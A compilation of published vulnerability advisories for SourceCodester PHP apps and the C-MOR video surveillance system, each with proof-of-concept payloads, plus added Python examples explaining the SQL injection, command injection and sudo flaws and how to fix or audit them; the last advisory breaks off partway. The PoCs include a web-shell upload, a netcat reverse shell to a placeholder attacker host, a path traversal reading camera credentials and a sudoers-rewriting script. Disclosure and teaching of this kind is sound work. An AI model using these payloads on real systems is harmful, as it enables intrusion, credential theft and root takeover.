<pre><code>=============================================================================================================================================<br />| # Title : Online Tours and Travels Management System v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/php/14510/online-tours-travels-management-system-project-using-php-and-mysql.html |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure settings: the application appears to leave a default administrative account in place after installation.<br /><br />[+] Use the default credentials: user = admin / pass = admin123<br /><br />[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/<br /><br /><br />Greetings to :==================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |<br />================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Online Survey System 1.0 Authentication Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : Windows 10 Fr (Pro) / browser : Mozilla Firefox 128.0.3 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use the following SQL injection payload as both user and pass: ' or 0=0 ##<br /><br />[+] http://127.0.0.1/survey/<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
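The payload above works because the login query concatenates the submitted username and password into the SQL text. The following Python example is added here and is not part of indoushka's advisory or of the Online Survey System code (which the advisory does not quote); it reproduces the bypass against an in-memory SQLite table with constructed users and shows the parameterized query that defeats it. Because SQLite does not treat `#` as a comment marker the way MySQL does, the SQLite form of the payload ends in `--` instead of `##`.

```python
"""Added example (not part of the advisory above): why "' or 0=0 ##"
logs an attacker in, shown against an in-memory SQLite database.

Assumptions: the real application is PHP/MySQL; SQLite is used here only
so the example runs offline.  MySQL treats "#" as a comment marker,
SQLite does not, so the equivalent SQLite payload ends with "--".
The users table and its contents are constructed sample data."""
import sqlite3


def setup_db() -> sqlite3.Connection:
    """One legitimate admin whose password the attacker does not know."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.execute(
        "INSERT INTO users (username, password) VALUES ('admin', 's3cret-not-guessable')"
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """String-concatenated query: the pattern the advisory's payload exploits."""
    sql = (
        "SELECT id, username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    # With username = "' or 0=0 --" the statement becomes
    #   SELECT ... WHERE username = '' or 0=0 --' AND password = '...'
    # The tautology 0=0 matches every row and the comment discards the
    # password check, so the first user (here: admin) is returned.
    return conn.execute(sql).fetchone()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str):
    """Parameterized query: the payload is bound as data, never parsed as SQL."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def demo() -> dict:
    """Run the same payload through both versions of the login check."""
    conn = setup_db()
    payload = "' or 0=0 --"  # SQLite spelling of the advisory's "' or 0=0 ##"
    return {
        "vulnerable": login_vulnerable(conn, payload, payload),
        "parameterized": login_parameterized(conn, payload, payload),
        "legit": login_parameterized(conn, "admin", "s3cret-not-guessable"),
    }


if __name__ == "__main__":
    for name, row in demo().items():
        print(f"{name:14s} -> {row}")
```

The vulnerable branch returns the admin row without knowing any password; the parameterized branch returns nothing for the payload and still authenticates the real credentials, which is the whole fix: never let user input become part of the SQL grammar.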
<pre><code>Advisory ID: SYSS-2024-030<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: OS Command Injection (CWE-78)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45179<br />Authors of Advisory: Matthias Deeg (SySS GmbH), Chris Beiter,<br /> and Frederik Beimgraben<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to insufficient input validation, the C-MOR web interface is<br />vulnerable to OS command injection attacks.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that several<br />functions are vulnerable to OS command injection attacks, for<br />example those for generating new X.509 certificates or for setting<br />the time zone.<br /><br />The OS command injection vulnerability in the script "generatesslreq.pml"<br />can be exploited as a low-privileged authenticated user (see<br />SYSS-2024-024[3]) in order to execute commands in the context of the<br />Linux user "www-data".<br /><br />The OS command injection vulnerability in the script 
"settimezone.pml"<br />requires an administrative user for the C-MOR web interface.<br /><br />By also exploiting the privilege escalation vulnerability described in<br />SYSS-2024-027[4], it is possible to execute commands on the C-MOR system<br />with root privileges.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />By sending the following HTTP POST request to the script<br />"generatesslreq.pml", the OS command injected via the parameter<br />"city" is executed as Linux user "www-data".<br /><br />In this sample attack vector, a simple PHP web shell is created in<br />the backup directory within the web server's webroot:<br /><br />POST /generatesslreq.pml HTTP/1.1<br />Host: <HOST><br />Authorization: Basic <CREDENTIALS><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 152<br />Connection: close<br /><br />countrycode=de&state=state&city=city'|echo '<?php echo system($_GET["cmd"]);?>' > /srv/www/htdocs/backup/webshell.php #&organization=org&servername=syss<br /><br /><br />This PoC attack can be performed using the following curl command (the<br />dollar sign and the inner double quotes are escaped so that the local<br />shell passes them through to curl unchanged):<br /><br />curl -X POST \<br /> -d "countrycode=de&state=state&city=city'|echo '<?php echo system(\$_GET[\"cmd\"]);?>' > /srv/www/htdocs/backup/webshell.php #&organization=org&servername=syss" \<br /> --user "<USERNAME>:<PASSWORD>" \<br /> --ciphers "DEFAULT:!DH" \<br /> https://<HOST>/generatesslreq.pml<br /><br />The uploaded web shell can be used via the following URL:<br /><br />https://<HOST>/backup/webshell.php?cmd=<COMMAND><br /><br /><br />In version 6.00PL01, an OS command injection was, for instance, still<br />possible using the following attack vector, which starts a netcat<br />reverse shell to the attacker's host:<br /><br />curl -X POST \<br /> -d 'hour=00&min=34&sec=27&day=06&month=06&year=2024+%26%26+nc+<ATTACKERIP>+<ATTACKER-PORT>+-e+/bin/bash+%26' \<br /> --user "<USERNAME>:<PASSWORD>" \<br /> --insecure \<br /> --ciphers 'DEFAULT:!DH' \<br /> https://<HOST>/en/setdatetime.pml<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />The described security vulnerability has not been fixed entirely in the<br />newly released software version 6.00PL01.<br /><br />There is no complete fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-030<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-030.txt<br />[3] SySS Security Advisory SYSS-2024-024<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt<br />[4] SySS Security Advisory SYSS-2024-027<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt<br />[5] SySS Responsible 
Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter, Frederik<br />Beimgraben, and Matthias Deeg.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /></code></pre>
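What makes the `city` parameter exploitable is that its value is spliced into a shell command string, so the quote, pipe, redirect and comment characters in the payload are interpreted by `/bin/sh`. The Python example below is added here and is not code from the SySS advisory or from C-MOR; the advisory does not show the server-side code, so a `printf` call stands in for whatever generatesslreq.pml runs and a marker file stands in for webshell.php. It replays the advisory's injection shape (close the quote, pipe into a command with a redirect, comment out the rest) against the concatenated form and against a version that validates the field and passes arguments as a list.

```python
"""Added example (not from the SySS advisory): how a subject field like
"city" reaches the shell, reproduced with a harmless stand-in command.

Assumptions: the real generatesslreq.pml presumably hands the subject
fields to an OpenSSL invocation, but the advisory does not show that
code, so `printf` is used as a stand-in and a marker file is written
instead of a PHP web shell.  Everything below is constructed."""
import os
import re
import subprocess
import tempfile
from typing import Optional

# Conservative allowlist for an X.509 subject component (assumption:
# letters, digits, space, dot and dash are enough for the deployments
# that matter; widen deliberately, never by accident).
_SUBJECT_FIELD = re.compile(r"^[A-Za-z0-9 .-]{1,64}$")


def build_subject_vulnerable(city: str) -> str:
    """Shell command assembled by string concatenation (the CWE-78 pattern)."""
    return "printf '%s' '/C=de/ST=state/L=" + city + "/O=org/CN=syss'"


def run_vulnerable(city: str) -> str:
    # shell=True hands the whole string to /bin/sh, so ' | > and # inside
    # `city` are parsed as shell syntax, exactly as in the advisory's PoC.
    proc = subprocess.run(build_subject_vulnerable(city), shell=True,
                          capture_output=True, text=True, check=False)
    return proc.stdout


def run_hardened(city: str) -> str:
    """Validate against the allowlist, then pass argv as a list: no shell
    is involved, so metacharacters in `city` are just bytes in one argument."""
    if not _SUBJECT_FIELD.fullmatch(city):
        raise ValueError("invalid characters in subject field")
    proc = subprocess.run(
        ["printf", "%s", "/C=de/ST=state/L=" + city + "/O=org/CN=syss"],
        capture_output=True, text=True, check=False)
    return proc.stdout


def demo(workdir: Optional[str] = None) -> dict:
    """Replay the advisory's injection: terminate the quoted subject, pipe into
    a command that writes a file, and comment out the trailing syntax.
    The marker file plays the role of /srv/www/htdocs/backup/webshell.php."""
    workdir = workdir or tempfile.mkdtemp()
    marker = os.path.join(workdir, "marker.txt")
    payload = "city'|echo injected > " + marker + " #"

    vulnerable_output = run_vulnerable(payload)
    marker_written = os.path.exists(marker)

    try:
        run_hardened(payload)
        hardened_rejected = False
    except ValueError:
        hardened_rejected = True

    return {
        "vulnerable_output": vulnerable_output,   # empty: stdout went into the pipe
        "marker_written": marker_written,         # True: the injected command ran
        "hardened_rejected": hardened_rejected,   # True: payload never reached exec
        "hardened_ok": run_hardened("Tuebingen"),  # normal input still works
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18s} {value!r}")
```

Note that the list form alone would already stop the injection; the allowlist is there because a subject string is later consumed by other tools, and "no shell" does not mean "any bytes are fine".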
<pre><code>Advisory ID: SYSS-2024-028<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: Cleartext Storage of Sensitive Information (CWE-312)<br />Risk Level: Medium<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45175<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Sensitive information, such as camera login credentials, is stored in<br />cleartext.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR system, it was found that sensitive information,<br />for example the login credentials of cameras, is stored in cleartext.<br /><br />Thus, an attacker with file system access, for example by exploiting the<br />path traversal attack described in SYSS-2024-025[3], has access to the<br />login data of all configured cameras or of the configured FTP server.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />By exploiting the path traversal attack in the backup download script<br 
/>"download-bkf.pml", login credentials of cameras can be retrieved, as<br />the following HTTP request and the corresponding response demonstrate:<br /><br />POST /download-bkf.pml HTTP/1.1<br />Host: <HOST><br />Authorization: Basic <CREDENTIALS><br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 24<br />Connection: close<br /><br />bkf=../../../etc/ip.cam1<br /><br /><br />HTTP/1.1 200 OK<br />(...)<br /><br />192.168.1.11<br />80<br /><USERNAME><br /><PASSWORD><br /><br /><br />This PoC attack can be performed using the following curl command:<br /><br />$ curl -X POST -d 'bkf=../../../etc/ip.cam1' \<br /> --user '<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH' \<br /> https://<HOST>/download-bkf.pml<br />192.168.1.11<br />80<br /><USERNAME><br /><PASSWORD><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br 
/>~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-028<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-028.txt<br />[3] SySS Security Advisory SYSS-2024-025<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt<br />[4] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter and Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2024-027<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401, 6.00PL01<br />Tested Version(s): 5.2401, 6.00PL01<br />Vulnerability Type: Improper Privilege Management (CWE-269)<br />Risk Level: High<br />Solution Status: Open<br />Manufacturer Notification: 2024-04-05<br />Solution Date: -<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45173<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper privilege management concerning sudo privileges, C-MOR<br />is vulnerable to a privilege escalation attack.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR system with shell access (see SYSS-2024-026[3]),<br />it was found that the Linux user "www-data" running the C-MOR web<br />interface can execute some OS commands as root via sudo without having<br />to enter the root password.<br /><br />These commands, for example, include "cp", "chown", and "chmod", which<br />enable an attacker to modify the system's sudoers file in order to<br />execute all commands with root privileges.<br /><br />Thus, it is possible to escalate the limited privileges of 
the user<br />"www-data" to root privileges.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />For demonstrating a privilege escalation attack with shell access as<br />the user "www-data", the following shell script was uploaded to the<br />C-MOR system and executed:<br /><br />$ cat privesc.sh<br />sudo cp /etc/sudoers /home/cam<br />sudo chown www-data /home/cam/sudoers<br />sudo chmod 777 /home/cam/sudoers<br />echo 'www-data ALL = (ALL) NOPASSWD: ALL' >> /home/cam/sudoers<br />sudo chmod 440 /home/cam/sudoers<br />sudo chown root /home/cam/sudoers<br />sudo cp /home/cam/sudoers /etc/sudoers<br />sudo rm /home/cam/sudoers<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />There is no fix for this security issue.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security advisories<br />2024-04-08: Exchange regarding security updates and disclosure timeline<br />2024-05-08: Further exchange concerning security updates and disclosure<br /> timeline; public release of all security advisories<br /> scheduled for release of C-MOR Video Surveillance version 6<br />2024-05-10: Release of C-MOR software version 5.30 with security updates<br /> for some reported security issues<br />2024-07-19: E-mail to manufacturer concerning release date of C-MOR<br /> Video Surveillance version 6; response with planned<br /> release date of 2024-08-01<br />2024-07-30: E-mail from manufacturer with further information<br /> concerning security fixes<br />2024-07-31: Release of C-MOR software version 6.00PL1<br />2024-09-04: Public release of security advisory<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br 
/>References:<br /><br />[1] Product website for C-MOR Video Surveillance<br /> https://www.c-mor.com/<br />[2] SySS Security Advisory SYSS-2024-027<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-027.txt<br />[3] SySS Security Advisory SYSS-2024-026<br /> https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt<br />[4] SySS Responsible Disclosure Policy<br /> https://www.syss.de/en/responsible-disclosure-policy/<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Credits:<br /><br />This security vulnerability was found by Chris Beiter and Frederik<br />Beimgraben.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclaimer:<br /><br />The information provided in this security advisory is provided "as is"<br />and without warranty of any kind. Details of this security advisory may<br />be updated in order to provide as accurate information as possible. The<br />latest version of this security advisory is available on the SySS Web<br />site.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Copyright:<br /><br />Creative Commons - Attribution (by) - Version 3.0<br />URL: http://creativecommons.org/licenses/by/3.0/deed.en<br /><br /></code></pre>
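The advisory's privesc.sh needs only three NOPASSWD entries: cp to copy the sudoers file out and back, chown and chmod to make the copy writable in between. Any sudo rule that gives a service account a root-level way to create, replace or re-permission arbitrary files has the same effect. The Python example below is added here and is not from the SySS advisory; it is an audit check that parses sudoers-style user specifications (a constructed sample, not C-MOR's real file, which the advisory does not reproduce) and flags exactly that class of entry for a given account.

```python
"""Added example (not part of the SySS advisory): an audit for the sudo
misconfiguration the advisory describes.

Assumptions: rules use the common "user host = (runas) TAG: cmd, cmd"
form of a sudoers user specification; aliases, Defaults and group rules
are skipped.  SAMPLE_SUDOERS is constructed and is not C-MOR's file."""
import re
from typing import Dict, List, Tuple

# Binaries that let the caller create, replace or re-permission arbitrary
# files when run as root.  Any one of the first three is enough to rewrite
# /etc/sudoers the way the advisory's privesc.sh does; the rest reach the
# same end by other routes.  Argument-restricted entries are still
# reported because they deserve manual review.
FILE_WRITE_PRIMITIVES: Dict[str, str] = {
    "cp": "copies an attacker-controlled file over /etc/sudoers",
    "chown": "transfers ownership of a root-owned file to the caller",
    "chmod": "makes a root-owned file writable by the caller",
    "mv": "renames an attacker-controlled file into place",
    "tee": "appends attacker-controlled text to any file",
    "dd": "writes attacker-controlled bytes to any file",
}

_RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

_SKIP_PREFIXES = ("Defaults", "%", "User_Alias", "Cmnd_Alias",
                  "Host_Alias", "Runas_Alias")


def parse_sudoers(text: str) -> List[dict]:
    """Parse user specifications into dicts; comments and non-user lines are dropped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(_SKIP_PREFIXES):
            continue
        m = _RULE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        rules.append({
            "user": m.group("user"),
            # "(ALL:ALL)" carries a group part; only the user part matters here.
            "runas": (m.group("runas") or "root").split(":")[0],
            "nopasswd": "NOPASSWD" in tags,
            "cmds": [c.strip() for c in m.group("cmds").split(",")],
        })
    return rules


def audit(rules: List[dict], user: str) -> List[Tuple[str, str]]:
    """Return (command, reason) pairs for NOPASSWD root commands `user` can abuse."""
    findings = []
    for rule in rules:
        if (rule["user"] != user or not rule["nopasswd"]
                or rule["runas"] not in ("root", "ALL")):
            continue
        for cmd in rule["cmds"]:
            if cmd == "ALL":
                findings.append((cmd, "unrestricted root shell via sudo"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]   # "/bin/cp" -> "cp"
            if binary in FILE_WRITE_PRIMITIVES:
                findings.append((cmd, FILE_WRITE_PRIMITIVES[binary]))
    return findings


SAMPLE_SUDOERS = """\
# constructed sample modelled on the rule class the advisory describes
Defaults env_reset
root     ALL=(ALL:ALL) ALL
www-data ALL=(root) NOPASSWD: /bin/cp, /bin/chown, /bin/chmod, /usr/sbin/service apache2 restart
cam      ALL=(root) NOPASSWD: /sbin/reboot
"""


def demo() -> List[Tuple[str, str]]:
    return audit(parse_sudoers(SAMPLE_SUDOERS), "www-data")


if __name__ == "__main__":
    for cmd, reason in demo():
        print(f"{cmd:12s} {reason}")
```

On a live system the same check can be fed the output of `sudo -l` for the web server account; the three flagged entries in the sample are the exact set the advisory's script uses.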
<pre><code>Advisory ID: SYSS-2024-026<br />Product: C-MOR Video Surveillance<br />Manufacturer: za-internet GmbH<br />Affected Version(s): 5.2401<br />Tested Version(s): 5.2401<br />Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)<br />Risk Level: High<br />Solution Status: Fixed<br />Manufacturer Notification: 2024-04-05<br />Solution Date: 2024-07-31<br />Public Disclosure: 2024-09-04<br />CVE Reference: CVE-2024-45171<br />Authors of Advisory: Chris Beiter, Frederik Beimgraben,<br /> and Matthias Deeg<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />The software product C-MOR is an IP video surveillance system.<br /><br />The manufacturer describes the product as follows:<br /><br />"With C-MOR video surveillance, it is possible to check your<br />surveillance over network and the Internet. You can access the live<br />view as well as previous recordings from any PC or mobile device.<br />C-MOR is managed and controlled over the C-MOR web interface.<br />IP settings, camera recording setup, user rights and so on are set<br />over the web without the installation of any software on the<br />client."[1]<br /><br />Due to improper user input validation, it is possible to upload<br />dangerous files, for instance PHP code, to the C-MOR system.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />By analyzing the C-MOR web interface, it was found that the<br />upload functionality for backup files allows an authenticated user to<br />upload arbitrary files. 
The only condition is that the file name<br />contains the string ".cbkf".<br /><br />Therefore, "webshell.cbkf.php" is considered a valid file name for<br />the C-MOR web application.<br /><br />Uploaded files are stored within the directory "/srv/www/backups" on<br />the C-MOR system and can thus be accessed via the URL<br />https://<HOST>/backup/upload_<FILENAME>.<br /><br />Due to broken access control, low-privileged authenticated users can<br />also use this file upload functionality (see SYSS-2024-024[3]).<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />Using the upload functionality for backup files, it is possible to<br />upload arbitrary PHP code, for instance a simple PHP web shell such<br />as the following one, in a file named "webshell.cbkf.php":<br /><br /><?php echo system($_GET['cmd']); ?><br /><br />After a successful file upload, the uploaded PHP web shell can be<br />accessed and used via the following URL, leading to OS command<br />execution:<br /><br />https://<HOST>/backup/upload_webshell.cbkf.php?cmd=<COMMAND><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Install C-MOR Video Surveillance version 6.00PL1.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Disclosure Timeline:<br /><br />2024-04-05: Vulnerability reported to manufacturer<br />2024-04-05: Manufacturer acknowledges receipt of security 